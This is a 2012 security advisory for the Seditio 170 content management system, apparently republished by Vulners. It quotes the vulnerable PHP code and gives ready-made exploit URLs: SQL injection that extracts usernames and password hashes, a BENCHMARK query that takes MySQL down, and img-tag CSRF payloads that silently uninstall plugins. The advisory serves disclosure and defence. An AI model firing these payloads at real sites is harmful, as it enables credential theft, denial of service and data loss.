Vulners
Lucene search
Seditio 170 Cross Site Request Forgery / SQL Injection
`============================================================
Vulnerable Software: Seditio 170 (seditio-build170.20120302)
Downloaded from:http://www.neocrome.net/files/code/seditio-build170.20120302.rar
(MD5 SUM:beb6adc6abb56f947698c1efdbae9430 *seditio-build170.20120302.rar)
============================================================
Tested:
*php.ini MAGIC_QUOTES_GPC OFF*
Safe mode off
/*
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version()
-> ;
+-----------+
| version() |
+-----------+
| 5.5.21 |
+-----------+
*/
===========================================================
Vuln Desc:
Seditio 170 (seditio-build170.20120302) is Prone to SQL injection vulnerability.
Note:*For successfull exploitation requires administrative authentication to system.*
//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');
if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");
Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users--%20or%271%27!=%271--
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,concat%28user_name,0x3a,user_password%29%20from%20sed170_users%20where%20user_id=1--%20or%271%27!=%271--
Overload MYSQL server:(As result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF especially if you have no any access to system as admin.
In eg:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />
Print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png
Seditio 170 (seditio-build170.20120302) also prone to CSRF (Cross Site Request Forgery)
vulnerability because it doesn't checks request validity throught $_GET request
and as result we can silently Uninstall/stop/pause/start plugins which may cause:
Data loss,functionality loss.
===========================================================================================
/*Tested with Seditio 165/seditio-build170.20120302 versions [Uninstall Plugins] CSRF exploit.*/
//Works for me.
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://192.168.0.15/learn/128/sed/seditio165/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
==============================================================================================
Information Disclosure:
Try to post in inputs very long string.
Application will expose column.names which is not acceptable anymore from security consideration.
In eg:
Client Side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>
http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP
Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1
Persistent Cross Site Scripting vulnerability still unfixed.(from Seditio 161)
Same Info/Path disclosures still unfixed.(from Seditio 161).
("Thanks" for TinyMCE editor and thanks to client side validation)(from Seditio 161)
I notified about it here+ to vendor too but it still unfixed in 170.20120302 too.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Apr 2012 00:00Current
0.5Low risk
Vulners AI Score0.5